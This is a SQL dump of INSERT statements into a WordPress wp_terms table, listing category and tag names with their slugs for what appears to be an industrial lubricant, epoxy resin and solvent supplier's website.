INSERT INTO `wp_terms` VALUES (108, 'Oil', 'oil', 0); 
INSERT INTO `wp_terms` VALUES (109, 'GPL', 'gpl', 0); 
INSERT INTO `wp_terms` VALUES (110, 'Additive', 'additive', 0); 
INSERT INTO `wp_terms` VALUES (111, 'Anticorrosion', 'anticorrosion', 0); 
INSERT INTO `wp_terms` VALUES (112, 'sodium nitrite', 'sodium-nitrite', 0); 
INSERT INTO `wp_terms` VALUES (113, 'Extreme Pressure', 'extreme-pressure', 0); 
INSERT INTO `wp_terms` VALUES (114, 'Lubrication', 'lubrication', 0); 
INSERT INTO `wp_terms` VALUES (115, 'XHT Greases', 'krytox-xht-grease', 0); 
INSERT INTO `wp_terms` VALUES (116, 'XHT Oils', 'xht-oils', 0); 
INSERT INTO `wp_terms` VALUES (117, 'Krytox™ Lubricant Articles', 'krytox-articles', 0); 
INSERT INTO `wp_terms` VALUES (118, 'High Temperature', 'high-temperature', 0); 
INSERT INTO `wp_terms` VALUES (119, 'XHT', 'xht', 0); 
INSERT INTO `wp_terms` VALUES (120, 'BD', 'bd', 0); 
INSERT INTO `wp_terms` VALUES (121, 'Non Melting', 'non-melting', 0); 
INSERT INTO `wp_terms` VALUES (122, 'XHT-AC Series', 'krytox-xht-ac', 0); 
INSERT INTO `wp_terms` VALUES (123, 'XHT-BD Series', 'krytox-xht-bd', 0); 
INSERT INTO `wp_terms` VALUES (124, 'XHT-S Series', 'krytox-xht-s-series', 0); 
INSERT INTO `wp_terms` VALUES (125, 'Automotive', 'automotive', 0); 
INSERT INTO `wp_terms` VALUES (126, 'AUT', 'aut', 0); 
INSERT INTO `wp_terms` VALUES (127, 'EPIKURE™ Curing Agents', 'epikure-curing-agents', 0); 
INSERT INTO `wp_terms` VALUES (128, 'EPI-REZ™ Water-borne Resin', 'epi-rez-epoxy-resins', 0); 
INSERT INTO `wp_terms` VALUES (129, 'Heloxy™ Epoxy Functional Modifiers', 'heloxyepoxy-functional-modifiers', 0); 
INSERT INTO `wp_terms` VALUES (130, 'NRT 8900 Series', 'krytox-nrt-8900-series', 0); 
INSERT INTO `wp_terms` VALUES (131, 'NRT PLSS Series', 'krytox-nrt-plss', 0); 
INSERT INTO `wp_terms` VALUES (132, 'NRT', 'nrt', 0); 
INSERT INTO `wp_terms` VALUES (133, 'Reactive', 'reactive', 0); 
INSERT INTO `wp_terms` VALUES (134, 'Oxygen', 'oxygen', 0); 
INSERT INTO `wp_terms` VALUES (135, 'Safe', 'safe', 0); 
INSERT INTO `wp_terms` VALUES (136, 'LVP', 'lvp', 0); 
INSERT INTO `wp_terms` VALUES (137, 'Unmodified Liquid Epoxy Resins', 'unmodified-liquid-epoxy-resins', 0); 
INSERT INTO `wp_terms` VALUES (138, 'Modified Liquid Epoxy Resins', 'modified-liquid-epoxy-resins', 0); 
INSERT INTO `wp_terms` VALUES (139, 'H-1 Rated', 'h-1-rated', 0); 
INSERT INTO `wp_terms` VALUES (140, 'NSF', 'nsf', 0); 
INSERT INTO `wp_terms` VALUES (141, 'Food Contact', 'food-contact', 0); 
INSERT INTO `wp_terms` VALUES (142, 'Epoxy Resin Blends', 'epon-epoxy-resin-blends', 0); 
INSERT INTO `wp_terms` VALUES (143, 'Other Krytox', 'other-krytox', 0); 
INSERT INTO `wp_terms` VALUES (144, 'Solid Epoxy Solutions', 'epon-solid-epoxy-solutions', 0); 
INSERT INTO `wp_terms` VALUES (145, 'Solid Epoxy Resins', 'epon-solid-epoxy-resins', 0); 
INSERT INTO `wp_terms` VALUES (146, 'VPF', 'vpf', 0); 
INSERT INTO `wp_terms` VALUES (147, 'Vacuum Pump', 'vacuum-pump', 0); 
INSERT INTO `wp_terms` VALUES (148, 'Fluid', 'fluid', 0); 
INSERT INTO `wp_terms` VALUES (149, 'Krytox &amp; Lubricants', 'lubricants', 0); 
INSERT INTO `wp_terms` VALUES (150, 'Teflon Lubricants', 'teflon-lubricants', 0); 
INSERT INTO `wp_terms` VALUES (151, 'TriboSys Lubricants', 'tribosys-lubricants', 0); 
INSERT INTO `wp_terms` VALUES (152, 'Epoxy Novolac Resins', 'epon-epoxy-novolac-resins', 0); 
INSERT INTO `wp_terms` VALUES (153, 'FSH', 'fsh', 0); 
INSERT INTO `wp_terms` VALUES (154, 'Surfactant', 'surfactant', 0); 
INSERT INTO `wp_terms` VALUES (155, 'EPONEX™ Cyclo-aliphatic Resin', 'eponex-cycloaliphatic-resin', 0); 
INSERT INTO `wp_terms` VALUES (156, 'EG Series', 'krytox-electronic-grade-krytox-grease', 0); 
INSERT INTO `wp_terms` VALUES (157, 'Electronic', 'electronic', 0); 
INSERT INTO `wp_terms` VALUES (158, 'EG', 'eg', 0); 
INSERT INTO `wp_terms` VALUES (159, 'Epoxy Acrylates', 'epoxy-polyacrylates', 0); 
INSERT INTO `wp_terms` VALUES (160, 'FPG Series', 'krytox-fpg-grease', 0); 
INSERT INTO `wp_terms` VALUES (161, 'Elastomer Modified Resins', 'epon-elastomer-modified-epoxy-resins', 0); 
INSERT INTO `wp_terms` VALUES (162, 'FPG', 'fpg', 0); 
INSERT INTO `wp_terms` VALUES (163, 'Harsh', 'harsh', 0); 
INSERT INTO `wp_terms` VALUES (164, 'Environment', 'environment', 0); 
INSERT INTO `wp_terms` VALUES (165, 'Krytox TS4 Thread Sealant', 'krytox-ts4', 0); 
INSERT INTO `wp_terms` VALUES (166, 'TS4', 'ts4', 0); 
INSERT INTO `wp_terms` VALUES (167, 'Thread Sealant', 'thread-sealant', 0); 
INSERT INTO `wp_terms` VALUES (168, 'XP Series', 'krytox-xp-oil', 0); 
INSERT INTO `wp_terms` VALUES (169, 'XP Oils', 'krytox-xp-oils', 0); 
INSERT INTO `wp_terms` VALUES (170, 'XP Grease', 'krytox-xp-grease', 0); 
INSERT INTO `wp_terms` VALUES (171, 'Other GPL', 'krytox-gpl-grease', 0); 
INSERT INTO `wp_terms` VALUES (172, 'XP', 'xp', 0); 
INSERT INTO `wp_terms` VALUES (173, 'Bearing', 'bearing', 0); 
INSERT INTO `wp_terms` VALUES (174, 'Electrical Laminating Resins', 'epon-electrical-laminating-resins', 0); 
INSERT INTO `wp_terms` VALUES (175, '3000 Series (Amido-amines)', 'epikure-3000-series-amidoamines', 0); 
INSERT INTO `wp_terms` VALUES (176, '3100 Series (Polyamides)', 'epikure-3100-series-polyamides', 0); 
INSERT INTO `wp_terms` VALUES (177, '3200 Series (Aliphatic Amines)', 'epikure-200-series-aliphatic-amines', 0); 
INSERT INTO `wp_terms` VALUES (178, '3300 Series (Cyclo-aliphatic Amines)', 'epikure-3300-series-cycloaliphatic-amines', 0); 
INSERT INTO `wp_terms` VALUES (179, 'EPIKURE™ W', 'epikure-w-composites', 0); 
INSERT INTO `wp_terms` VALUES (180, 'Mono-functional Aliphatic Glycidyl Ethers', 'heloxy-monofunctional-aliphatic-glycidyl-ethers', 0); 
INSERT INTO `wp_terms` VALUES (181, 'Mono-functional Aromatic Glycidyl Ethers', 'heloxy-monofunctional-aromatic-glycidyl-ethers', 0); 
INSERT INTO `wp_terms` VALUES (182, 'AGL', 'agl', 0); 
INSERT INTO `wp_terms` VALUES (183, '683', '683', 0); 
INSERT INTO `wp_terms` VALUES (184, 'Gearbox', 'gearbox', 0); 
INSERT INTO `wp_terms` VALUES (185, 'TM7', 'tm7', 0); 
INSERT INTO `wp_terms` VALUES (186, 'Tire', 'tire', 0); 
INSERT INTO `wp_terms` VALUES (187, 'PFPE', 'pfpe', 0); 
INSERT INTO `wp_terms` VALUES (188, 'h-1', 'h-1', 0); 
INSERT INTO `wp_terms` VALUES (189, 'rated', 'rated', 0); 
INSERT INTO `wp_terms` VALUES (190, 'Teflon', 'teflon', 0); 
INSERT INTO `wp_terms` VALUES (191, 'THE', 'the', 0); 
INSERT INTO `wp_terms` VALUES (192, 'TriboSys', 'tribosys', 0); 
INSERT INTO `wp_terms` VALUES (193, 'Food Grade', 'food-grade', 0); 
INSERT INTO `wp_terms` VALUES (194, 'THT', 'tht', 0); 
INSERT INTO `wp_terms` VALUES (195, 'High Temp', 'high-temp', 0); 
INSERT INTO `wp_terms` VALUES (196, 'TSS', 'tss', 0); 
INSERT INTO `wp_terms` VALUES (197, 'TWL', 'twl', 0); 
INSERT INTO `wp_terms` VALUES (198, '407', '407', 0); 
INSERT INTO `wp_terms` VALUES (199, 'Krytox', 'krytox', 0); 
INSERT INTO `wp_terms` VALUES (200, 'TM7', 'tm7', 0); 
INSERT INTO `wp_terms` VALUES (201, 'Tire Mold', 'tire-mold', 0); 
INSERT INTO `wp_terms` VALUES (202, 'XHT', 'xht', 0); 
INSERT INTO `wp_terms` VALUES (203, 'BDZ', 'bdz', 0); 
INSERT INTO `wp_terms` VALUES (204, 'BDX', 'bdx', 0); 
INSERT INTO `wp_terms` VALUES (205, 'Grease', 'grease', 0); 
INSERT INTO `wp_terms` VALUES (206, 'Injection Molding', 'injection-molding', 0); 
INSERT INTO `wp_terms` VALUES (207, 'Lube', 'lube', 0); 
INSERT INTO `wp_terms` VALUES (208, 'For', 'for', 0); 
INSERT INTO `wp_terms` VALUES (209, 'Life', 'life', 0); 
INSERT INTO `wp_terms` VALUES (210, 'AUT', 'aut', 0); 
INSERT INTO `wp_terms` VALUES (211, '2E45', '2e45', 0); 
INSERT INTO `wp_terms` VALUES (212, 'Opteon™ &amp; Vertrel™ Articles', 'opteon-articles', 0); 
INSERT INTO `wp_terms` VALUES (213, 'Vertrel', 'vertrel', 0); 
INSERT INTO `wp_terms` VALUES (214, 'npB', 'npb', 0); 
INSERT INTO `wp_terms` VALUES (215, 'replacement', 'replacement', 0); 
INSERT INTO `wp_terms` VALUES (216, 'Miller-Stephenson Articles', 'miller-stephenson-articles', 0); 
INSERT INTO `wp_terms` VALUES (217, 'HCFC 225', 'hcfc-225', 0); 
INSERT INTO `wp_terms` VALUES (218, 'Cleaning', 'cleaning', 0); 
INSERT INTO `wp_terms` VALUES (219, 'Dental', 'dental', 0); 
INSERT INTO `wp_terms` VALUES (220, 'Lubricant', 'lubricant', 0); 
INSERT INTO `wp_terms` VALUES (221, 'FluoroExtreme', 'fluoroextreme', 0); 
INSERT INTO `wp_terms` VALUES (222, 'Oil', 'oil', 0); 
INSERT INTO `wp_terms` VALUES (223, 'Opteon', 'opteon', 0); 
INSERT INTO `wp_terms` VALUES (224, 'Sion', 'sion', 0); 
INSERT INTO `wp_terms` VALUES (225, 'Solvent', 'solvent', 0); 
INSERT INTO `wp_terms` VALUES (226, 'Degreaser', 'degreaser', 0); 
INSERT INTO `wp_terms` VALUES (227, 'Epoxy Adhesive Kit', 'epoxy-adhesive-kit-ms-907', 0); 
INSERT INTO `wp_terms` VALUES (228, 'Epoxy Stripping Agent', 'epoxy-stripping-agent-ms-111', 0); 
INSERT INTO `wp_terms` VALUES (229, 'Poly-functional Glycidyl Ethers', 'heloxy-poly-functional-glycidyl-ethers', 0); 
INSERT INTO `wp_terms` VALUES (230, 'HELOXY™ Flexibilizers', 'heloxy-flexibilizers', 0); 
INSERT INTO `wp_terms` VALUES (231, 'Opteon™', 'opteon-solvents', 0); 
INSERT INTO `wp_terms` VALUES (232, 'Vertrel™', 'vertrel', 0); 
INSERT INTO `wp_terms` VALUES (233, 'Vertrel', 'vertrel', 0); 
INSERT INTO `wp_terms` VALUES (234, 'MCA', 'mca', 0); 
INSERT INTO `wp_terms` VALUES (235, 'Solvent', 'solvent', 0); 
INSERT INTO `wp_terms` VALUES (236, 'Degreaser', 'degreaser', 0); 
INSERT INTO `wp_terms` VALUES (237, 'SDG', 'sdg', 0); 
INSERT INTO `wp_terms` VALUES (238, 'SFR', 'sfr', 0); 
INSERT INTO `wp_terms` VALUES (239, 'XF', 'xf', 0); 
INSERT INTO `wp_terms` VALUES (240, 'Opteon', 'opteon', 0); 
INSERT INTO `wp_terms` VALUES (241, 'Sion', 'sion', 0); 
INSERT INTO `wp_terms` VALUES (242, 'Vapor', 'vapor', 0); 
INSERT INTO `wp_terms` VALUES (243, 'Contact', 'contact', 0); 
INSERT INTO `wp_terms` VALUES (244, 'Re-Nu', 're-nu', 0); 
INSERT INTO `wp_terms` VALUES (245, 'Cleaner', 'cleaner', 0); 
INSERT INTO `wp_terms` VALUES (247, 'Plastic', 'plastic', 0); 
INSERT INTO `wp_terms` VALUES (248, 'Metal', 'metal', 0); 
INSERT INTO `wp_terms` VALUES (249, 'Glass', 'glass', 0); 
INSERT INTO `wp_terms` VALUES (250, 'Suprion', 'suprion', 0); 
INSERT INTO `wp_terms` VALUES (251, 'MS-555', 'ms-555', 0); 
INSERT INTO `wp_terms` VALUES (252, 'MS-557', 'ms-557', 0); 
INSERT INTO `wp_terms` VALUES (253, 'Flux Remover', 'flux-remover', 0); 
INSERT INTO `wp_terms` VALUES (254, 'Fluoroguard', 'fluoroguard', 0); 
INSERT INTO `wp_terms` VALUES (255, 'PCA', 'pca', 0); 
INSERT INTO `wp_terms` VALUES (256, 'SG', 'sg', 0); 
INSERT INTO `wp_terms` VALUES (257, 'PRO', 'pro', 0); 
INSERT INTO `wp_terms` VALUES (258, '283AB', '283ab', 0); 
INSERT INTO `wp_terms` VALUES (259, 'Vazo Free Radical Initiators', 'vazo-free-radical-initiators', 0); 
INSERT INTO `wp_terms` VALUES (260, 'PFPE Oils &amp; Greases', 'pfpe-oils-greases', 0); 
INSERT INTO `wp_terms` VALUES (261, 'Industrial Oils &amp; Greases', 'oils-greases', 0); 
INSERT INTO `wp_terms` VALUES (262, 'Connector Lubricants', 'connector-lubricants', 0); 
INSERT INTO `wp_terms` VALUES (263, 'General', 'general', 0); 
INSERT INTO `wp_terms` VALUES (264, 'Purpose', 'purpose', 0); 
INSERT INTO `wp_terms` VALUES (265, 'Oils', 'oils', 0); 
INSERT INTO `wp_terms` VALUES (266, '211X', '211x', 0); 
INSERT INTO `wp_terms` VALUES (267, '2110', '2110', 0); 
INSERT INTO `wp_terms` VALUES (268, '2111', '2111', 0); 
INSERT INTO `wp_terms` VALUES (269, '212X', '212x', 0); 
INSERT INTO `wp_terms` VALUES (270, '2120', '2120', 0); 
INSERT INTO `wp_terms` VALUES (271, '2121', '2121', 0); 
INSERT INTO `wp_terms` VALUES (272, 'Chain', 'chain', 0); 
INSERT INTO `wp_terms` VALUES (273, 'Gear', 'gear', 0); 
INSERT INTO `wp_terms` VALUES (274, 'Box', 'box', 0); 
INSERT INTO `wp_terms` VALUES (275, '214X', '214x', 0); 
INSERT INTO `wp_terms` VALUES (276, '2140', '2140', 0); 
INSERT INTO `wp_terms` VALUES (277, '2141', '2141', 0); 
INSERT INTO `wp_terms` VALUES (278, '2142', '2142', 0); 
INSERT INTO `wp_terms` VALUES (279, '2143', '2143', 0); 
INSERT INTO `wp_terms` VALUES (280, '2144', '2144', 0); 
INSERT INTO `wp_terms` VALUES (281, '2145', '2145', 0); 
INSERT INTO `wp_terms` VALUES (282, '2146', '2146', 0); 
INSERT INTO `wp_terms` VALUES (283, '216X', '216x', 0); 
INSERT INTO `wp_terms` VALUES (284, '2160', '2160', 0); 
INSERT INTO `wp_terms` VALUES (285, '2161', '2161', 0); 
INSERT INTO `wp_terms` VALUES (286, '2162', '2162', 0); 
INSERT INTO `wp_terms` VALUES (287, '2163', '2163', 0); 
INSERT INTO `wp_terms` VALUES (288, '2164', '2164', 0); 
INSERT INTO `wp_terms` VALUES (289, '217X', '217x', 0); 
INSERT INTO `wp_terms` VALUES (290, '2170', '2170', 0); 
INSERT INTO `wp_terms` VALUES (291, '2171', '2171', 0); 
INSERT INTO `wp_terms` VALUES (292, '2172', '2172', 0); 
INSERT INTO `wp_terms` VALUES (293, '2173', '2173', 0); 
INSERT INTO `wp_terms` VALUES (294, 'Roller', 'roller', 0); 
INSERT INTO `wp_terms` VALUES (295, '218X', '218x', 0); 
INSERT INTO `wp_terms` VALUES (296, '2180', '2180', 0); 
INSERT INTO `wp_terms` VALUES (297, '2181', '2181', 0); 
INSERT INTO `wp_terms` VALUES (298, 'Hydraulic', 'hydraulic', 0); 
INSERT INTO `wp_terms` VALUES (299, 'Compressor', 'compressor', 0); 
INSERT INTO `wp_terms` VALUES (300, '2210G', '2210g', 0); 
INSERT INTO `wp_terms` VALUES (301, '2211G', '2211g', 0); 
INSERT INTO `wp_terms` VALUES (302, '2212G', '2212g', 0); 
INSERT INTO `wp_terms` VALUES (303, '2213G', '2213g', 0); 
INSERT INTO `wp_terms` VALUES (304, '221X', '221x', 0); 
INSERT INTO `wp_terms` VALUES (305, '2220G', '2220g', 0); 
INSERT INTO `wp_terms` VALUES (306, '2221G', '2221g', 0); 
INSERT INTO `wp_terms` VALUES (307, '2222G', '2222g', 0); 
INSERT INTO `wp_terms` VALUES (308, 'High', 'high', 0); 
INSERT INTO `wp_terms` VALUES (309, 'Temperature', 'temperature', 0); 
INSERT INTO `wp_terms` VALUES (310, 'Food', 'food', 0); 
INSERT INTO `wp_terms` VALUES (311, 'Grade', 'grade', 0); 
INSERT INTO `wp_terms` VALUES (312, '223X', '223x', 0); 
INSERT INTO `wp_terms` VALUES (313, '2233FG', '2233fg', 0); 
INSERT INTO `wp_terms` VALUES (314, '2230FG', '2230fg', 0); 
INSERT INTO `wp_terms` VALUES (315, '2231FG', '2231fg', 0); 
INSERT INTO `wp_terms` VALUES (316, '2232FG', '2232fg', 0); 
INSERT INTO `wp_terms` VALUES (317, '110XN', '110xn', 0); 
INSERT INTO `wp_terms` VALUES (318, 'Aerosol', 'aerosol', 0); 
INSERT INTO `wp_terms` VALUES (319, '120X', '120x', 0); 
INSERT INTO `wp_terms` VALUES (320, 'MS-381', 'ms-381', 0); 
INSERT INTO `wp_terms` VALUES (321, 'MS-383', 'ms-383', 0); 
INSERT INTO `wp_terms` VALUES (322, 'Connector', 'connector', 0); 
INSERT INTO `wp_terms` VALUES (323, 'MS-124H', 'ms-124h', 0); 
INSERT INTO `wp_terms` VALUES (324, 'MS-126H', 'ms-126h', 0); 
INSERT INTO `wp_terms` VALUES (325, 'PTFE Dry Film Lubricants', 'ptfe-dry-film-lubricants', 0); 
INSERT INTO `wp_terms` VALUES (326, 'MS-122ADL', 'ms-122adl', 0); 
INSERT INTO `wp_terms` VALUES (327, 'Dry', 'dry', 0); 
INSERT INTO `wp_terms` VALUES (328, 'Film', 'film', 0); 
INSERT INTO `wp_terms` VALUES (329, 'Low', 'low', 0); 
INSERT INTO `wp_terms` VALUES (330, 'Global', 'global', 0); 
INSERT INTO `wp_terms` VALUES (331, 'Warming', 'warming', 0); 
INSERT INTO `wp_terms` VALUES (332, 'MS-122AD', 'ms-122ad', 0); 
INSERT INTO `wp_terms` VALUES (333, 'MS-122XD', 'ms-122xd', 0); 
INSERT INTO `wp_terms` VALUES (334, 'MS-143TE', 'ms-143te', 0); 
INSERT INTO `wp_terms` VALUES (335, 'Dryfilm', 'dryfilm', 0); 
INSERT INTO `wp_terms` VALUES (336, 'Release Agent', 'release-agent', 0); 
INSERT INTO `wp_terms` VALUES (337, 'Vydax', 'vydax', 0); 
INSERT INTO `wp_terms` VALUES (338, '960', '960', 0); 
INSERT INTO `wp_terms` VALUES (339, 'SolvSys', 'solvsys', 0); 
INSERT INTO `wp_terms` VALUES (340, 'Contact Cleaners', 'contact-cleaners', 0); 
INSERT INTO `wp_terms` VALUES (341, 'Flux Removers', 'flux-remover-catalog', 0); 
INSERT INTO `wp_terms` VALUES (343, 'Solvent Cleaners', 'solvent-cleaners', 0); 
INSERT INTO `wp_terms` VALUES (344, 'MS-755L', 'ms-755l', 0); 
INSERT INTO `wp_terms` VALUES (345, 'Flux', 'flux', 0); 
INSERT INTO `wp_terms` VALUES (346, 'Remover', 'remover', 0); 
INSERT INTO `wp_terms` VALUES (347, 'H0805A', 'h0805a', 0); 
INSERT INTO `wp_terms` VALUES (348, 'H0805B', 'h0805b', 0); 
INSERT INTO `wp_terms` VALUES (349, 'MS-560', 'ms-560', 0); 
INSERT INTO `wp_terms` VALUES (350, 'MS-562', 'ms-562', 0); 
INSERT INTO `wp_terms` VALUES (351, 'MS-725', 'ms-725', 0); 
INSERT INTO `wp_terms` VALUES (352, 'MS-727', 'ms-727', 0); 
INSERT INTO `wp_terms` VALUES (353, 'MS-760', 'ms-760', 0); 
INSERT INTO `wp_terms` VALUES (354, 'MS-762', 'ms-762', 0); 
INSERT INTO `wp_terms` VALUES (355, 'MS-765', 'ms-765', 0); 
INSERT INTO `wp_terms` VALUES (356, 'MS-767', 'ms-767', 0); 
INSERT INTO `wp_terms` VALUES (357, 'Cleaners', 'cleaners', 0); 
INSERT INTO `wp_terms` VALUES (358, 'Re-Move', 're-move', 0); 
INSERT INTO `wp_terms` VALUES (359, 'MS-250', 'ms-250', 0); 
INSERT INTO `wp_terms` VALUES (360, 'MS-252', 'ms-252', 0); 
INSERT INTO `wp_terms` VALUES (361, 'Fluorinated', 'fluorinated', 0); 
INSERT INTO `wp_terms` VALUES (362, 'Surface', 'surface', 0); 
INSERT INTO `wp_terms` VALUES (363, 'Prep', 'prep', 0); 
INSERT INTO `wp_terms` VALUES (364, 'Clean', 'clean', 0); 
INSERT INTO `wp_terms` VALUES (365, 'MS-255', 'ms-255', 0); 
INSERT INTO `wp_terms` VALUES (366, 'MS-257', 'ms-257', 0); 
INSERT INTO `wp_terms` VALUES (367, 'MS-280', 'ms-280', 0); 
INSERT INTO `wp_terms` VALUES (368, 'MS-282', 'ms-282', 0); 
INSERT INTO `wp_terms` VALUES (369, 'IPA', 'ipa', 0); 
INSERT INTO `wp_terms` VALUES (370, 'Aero', 'aero', 0); 
INSERT INTO `wp_terms` VALUES (371, 'Duster', 'duster', 0); 
INSERT INTO `wp_terms` VALUES (372, 'MS-222N', 'ms-222n', 0); 
INSERT INTO `wp_terms` VALUES (373, 'MS-222L', 'ms-222l', 0); 
INSERT INTO `wp_terms` VALUES (374, 'Quik', 'quik', 0); 
INSERT INTO `wp_terms` VALUES (375, 'Freeze', 'freeze', 0); 
INSERT INTO `wp_terms` VALUES (376, 'MS-242N', 'ms-242n', 0); 
INSERT INTO `wp_terms` VALUES (377, 'MS-242L', 'ms-242l', 0); 
INSERT INTO `wp_terms` VALUES (378, 'ShieldSys', 'shieldsys', 0); 
INSERT INTO `wp_terms` VALUES (379, 'RFI', 'rfi', 0); 
INSERT INTO `wp_terms` VALUES (380, 'Nickel', 'nickel', 0); 
INSERT INTO `wp_terms` VALUES (381, 'Coating', 'coating', 0); 
INSERT INTO `wp_terms` VALUES (382, 'Rust', 'rust', 0); 
INSERT INTO `wp_terms` VALUES (383, 'Inhibitor', 'inhibitor', 0); 
INSERT INTO `wp_terms` VALUES (384, 'Anti-Static', 'anti-static', 0); 
INSERT INTO `wp_terms` VALUES (385, 'Penetrating', 'penetrating', 0); 
INSERT INTO `wp_terms` VALUES (386, 'Conformal', 'conformal', 0); 
INSERT INTO `wp_terms` VALUES (387, 'Coatings', 'coatings', 0); 
INSERT INTO `wp_terms` VALUES (388, 'Teflon release agent', 'teflon-release-agent', 0); 
INSERT INTO `wp_terms` VALUES (389, 'semi-permanent', 'semi-permanent', 0); 
INSERT INTO `wp_terms` VALUES (390, 'water-based', 'water-based', 0); 
INSERT INTO `wp_terms` VALUES (391, 'PTFE release agent', 'ptfe-release-agent', 0); 
INSERT INTO `wp_terms` VALUES (392, 'mold release', 'mold-release', 0); 
INSERT INTO `wp_terms` VALUES (393, 'fluoropolymer', 'fluoropolymer', 0); 
INSERT INTO `wp_terms` VALUES (394, 'thermoset polysiloxane', 'thermoset-polysiloxane', 0); 
INSERT INTO `wp_terms` VALUES (395, 'MS-TMU', 'ms-tmu', 0); 
INSERT INTO `wp_terms` VALUES (396, 'Multi', 'multi', 0); 
INSERT INTO `wp_terms` VALUES (397, 'Use', 'use', 0); 
INSERT INTO `wp_terms` VALUES (398, 'non-flammable', 'non-flammable', 0); 
INSERT INTO `wp_terms` VALUES (399, 'high-performance mold release', 'high-performance-mold-release', 0); 
INSERT INTO `wp_terms` VALUES (400, 'conformal coating', 'conformal-coating', 0); 
INSERT INTO `wp_terms` VALUES (401, 'protective coating', 'protective-coating', 0); 
INSERT INTO `wp_terms` VALUES (402, 'polymer film', 'polymer-film', 0); 
INSERT INTO `wp_terms` VALUES (403, 'protective polymer film', 'protective-polymer-film', 0); 
INSERT INTO `wp_terms` VALUES (404, 'PCB coating', 'pcb-coating', 0); 
INSERT INTO `wp_terms` VALUES (405, 'circuit board coating', 'circuit-board-coating', 0); 
INSERT INTO `wp_terms` VALUES (406, 'Free radical initiator', 'free-radical-initiator', 0); 
INSERT INTO `wp_terms` VALUES (407, 'polymerization initiator', 'polymerization-initiator', 0); 
INSERT INTO `wp_terms` VALUES (408, 'polymerization agent', 'polymerization-agent', 0); 
INSERT INTO `wp_terms` VALUES (409, 'initiator', 'initiator', 0); 
INSERT INTO `wp_terms` VALUES (410, 'radical initiator', 'radical-initiator', 0); 
INSERT INTO `wp_terms` VALUES (411, 'releasys', 'releasys', 0); 
INSERT INTO `wp_terms` VALUES (412, 'Silicone', 'silicone', 0); 
INSERT INTO `wp_terms` VALUES (413, 'MS-538', 'ms-538', 0); 
INSERT INTO `wp_terms` VALUES (414, 'MS-539', 'ms-539', 0); 
INSERT INTO `wp_terms` VALUES (415, 'Electrical', 'electrical', 0); 
INSERT INTO `wp_terms` VALUES (416, 'MS-738', 'ms-738', 0); 
INSERT INTO `wp_terms` VALUES (417, 'MS-738M', 'ms-738m', 0); 
INSERT INTO `wp_terms` VALUES (418, 'MS-739', 'ms-739', 0); 
INSERT INTO `wp_terms` VALUES (419, 'Cobra', 'cobra', 0); 
INSERT INTO `wp_terms` VALUES (420, 'MS-228', 'ms-228', 0); 
INSERT INTO `wp_terms` VALUES (421, 'Spray', 'spray', 0); 
INSERT INTO `wp_terms` VALUES (422, 'Trigger', 'trigger', 0); 
INSERT INTO `wp_terms` VALUES (423, 'MS-224', 'ms-224', 0); 
INSERT INTO `wp_terms` VALUES (424, 'MS-907', 'ms-907', 0); 
INSERT INTO `wp_terms` VALUES (425, 'Two-Part', 'two-part', 0); 
INSERT INTO `wp_terms` VALUES (426, 'Epoxy', 'epoxy', 0); 
INSERT INTO `wp_terms` VALUES (427, 'Adhesive', 'adhesive', 0); 
INSERT INTO `wp_terms` VALUES (428, 'MS-720L', 'ms-720l', 0); 
INSERT INTO `wp_terms` VALUES (429, 'HEXION', 'hexion', 0); 
INSERT INTO `wp_terms` VALUES (430, 'Curing agent', 'curing-agent', 0); 
INSERT INTO `wp_terms` VALUES (431, 'polyamide', 'polyamide', 0); 
INSERT INTO `wp_terms` VALUES (432, 'EPIKURE', 'epikure', 0); 
INSERT INTO `wp_terms` VALUES (433, '3100 series', '3100-series', 0); 
INSERT INTO `wp_terms` VALUES (434, 'MS-530N', 'ms-530n', 0); 
INSERT INTO `wp_terms` VALUES (435, 'MS-532N', 'ms-532n', 0); 
INSERT INTO `wp_terms` VALUES (436, 'Epikure W', 'epikure-w', 0); 
INSERT INTO `wp_terms` VALUES (437, 'aliphatic amine', 'aliphatic-amine', 0); 
INSERT INTO `wp_terms` VALUES (438, '3200', '3200', 0); 
INSERT INTO `wp_terms` VALUES (439, 'amidoamines', 'amidoamines', 0); 
INSERT INTO `wp_terms` VALUES (440, 'amido amines', 'amido-amines', 0); 
INSERT INTO `wp_terms` VALUES (441, 'cycloaliphatic amines', 'cycloaliphatic-amines', 0); 
INSERT INTO `wp_terms` VALUES (442, 'cyclo-aliphatic amines', 'cyclo-aliphatic-amines', 0); 
INSERT INTO `wp_terms` VALUES (443, 'UltraPure Solvent', 'ultrapure-solvent', 0); 
INSERT INTO `wp_terms` VALUES (444, 'Vertrel MCA', 'vertrel-mca', 0); 
INSERT INTO `wp_terms` VALUES (445, 'Pure solvent', 'pure-solvent', 0); 
INSERT INTO `wp_terms` VALUES (446, 'cleanroom solvent', 'cleanroom-solvent', 0); 
INSERT INTO `wp_terms` VALUES (447, 'clean room solvent', 'clean-room-solvent', 0); 
INSERT INTO `wp_terms` VALUES (448, 'Precision cleaner', 'precision-cleaner', 0); 
INSERT INTO `wp_terms` VALUES (449, 'solvent cleaner', 'solvent-cleaner', 0); 
INSERT INTO `wp_terms` VALUES (450, 'electronic solvent cleaner', 'electronic-solvent-cleaner', 0); 
INSERT INTO `wp_terms` VALUES (451, 'release agents', 'release-agents', 0); 
INSERT INTO `wp_terms` VALUES (452, '200', '200', 0); 
INSERT INTO `wp_terms` VALUES (453, '1106', '1106', 0); 
INSERT INTO `wp_terms` VALUES (454, '1206', '1206', 0); 
INSERT INTO `wp_terms` VALUES (455, '2000', '2000', 0); 
INSERT INTO `wp_terms` VALUES (456, 'Application', 'application', 0); 
INSERT INTO `wp_terms` VALUES (457, 'Overview', 'overview', 0); 
INSERT INTO `wp_terms` VALUES (458, 'Lubricants', 'lubricants', 0); 
INSERT INTO `wp_terms` VALUES (459, 'TS4', 'ts4', 0); 
INSERT INTO `wp_terms` VALUES (460, 'Thread', 'thread', 0); 
INSERT INTO `wp_terms` VALUES (461, 'Sealant', 'sealant', 0); 
INSERT INTO `wp_terms` VALUES (462, 'MS-260', 'ms-260', 0); 
INSERT INTO `wp_terms` VALUES (463, 'Vertrel SMT', 'vertrel-smt', 0); 
INSERT INTO `wp_terms` VALUES (464, 'Frequently', 'frequently', 0); 
INSERT INTO `wp_terms` VALUES (465, 'Asked', 'asked', 0); 
INSERT INTO `wp_terms` VALUES (466, 'Questions', 'questions', 0); 
INSERT INTO `wp_terms` VALUES (467, 'FAQ', 'faq', 0); 
INSERT INTO `wp_terms` VALUES (468, 'Aviation', 'aviation', 0); 
INSERT INTO `wp_terms` VALUES (469, '240AC', '240ac', 0); 
INSERT INTO `wp_terms` VALUES (470, '250AD', '250ad', 0); 
